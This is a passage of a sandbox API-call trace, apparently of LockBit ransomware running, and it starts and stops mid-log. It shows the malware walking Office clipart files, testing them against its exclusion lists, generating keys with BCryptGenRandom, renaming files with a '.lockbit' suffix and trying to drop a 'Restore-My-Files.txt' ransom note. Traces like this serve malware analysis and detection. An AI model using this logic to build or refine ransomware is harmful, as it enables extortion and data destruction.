lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0146.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.206] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.206] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.207] free (_Block=0x1fa2ed8) [0146.207] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.207] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.207] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c54, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152894.WMF", cAlternateFileName="")) returned 1 [0146.207] lstrcmpiW (lpString1=".", lpString2="J0152894.WMF") returned -1 [0146.207] lstrcmpiW (lpString1="..", lpString2="J0152894.WMF") returned -1 [0146.207] PathFindExtensionW (pszPath="J0152894.WMF") returned=".WMF" [0146.207] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.207] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.207] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.207] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.208] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.209] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152894.WMF") returned 1 [0146.210] lstrcmpiW (lpString1="ntldr", lpString2="J0152894.WMF") returned 1 [0146.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152894.WMF") returned 1 [0146.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152894.WMF") returned -1 [0146.210] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152894.WMF") returned -1 [0146.210] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152894.WMF") returned 1 [0146.210] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152894.WMF") returned -1 [0146.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned=".WMF" [0146.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.210] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.211] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.211] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.lockbit") returned 72 [0146.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.212] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.212] malloc (_Size=0x40068) returned 0x3d70450 [0146.212] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=11348) returned 1 [0146.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0146.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0146.214] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.219] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.219] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.219] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.220] free (_Block=0x1fa2ed8) [0146.220] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.220] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.220] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1190, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152898.WMF", cAlternateFileName="")) returned 1 [0146.220] lstrcmpiW (lpString1=".", lpString2="J0152898.WMF") returned -1 [0146.220] lstrcmpiW (lpString1="..", lpString2="J0152898.WMF") returned -1 [0146.221] PathFindExtensionW (pszPath="J0152898.WMF") returned=".WMF" [0146.221] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.222] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.222] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152898.WMF") returned 1 [0146.223] lstrcmpiW (lpString1="ntldr", lpString2="J0152898.WMF") returned 1 [0146.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152898.WMF") returned 1 [0146.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152898.WMF") returned -1 [0146.223] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152898.WMF") returned -1 [0146.223] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152898.WMF") returned 1 [0146.224] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152898.WMF") returned -1 [0146.224] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.224] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned=".WMF" [0146.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.224] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.224] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.225] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.226] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.lockbit") returned 72 [0146.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.227] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.227] malloc (_Size=0x40068) returned 0x3e70008 [0146.227] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4496) returned 1 [0146.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0146.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0146.228] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0146.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.681] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.681] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.681] free (_Block=0x1fa2ed8) [0146.681] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.681] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.681] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.681] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x812c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153047.WMF", cAlternateFileName="")) returned 1 [0146.681] lstrcmpiW (lpString1=".", lpString2="J0153047.WMF") returned -1 [0146.681] lstrcmpiW (lpString1="..", lpString2="J0153047.WMF") returned -1 [0146.681] PathFindExtensionW (pszPath="J0153047.WMF") returned=".WMF" [0146.681] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.681] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.681] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.681] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.681] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.681] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.682] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.682] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.683] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153047.WMF") returned 1 [0146.683] lstrcmpiW (lpString1="ntldr", lpString2="J0153047.WMF") returned 1 [0146.683] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153047.WMF") returned 1 [0146.683] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153047.WMF") returned -1 [0146.683] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153047.WMF") returned -1 [0146.683] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153047.WMF") returned 1 [0146.683] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153047.WMF") returned -1 [0146.683] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 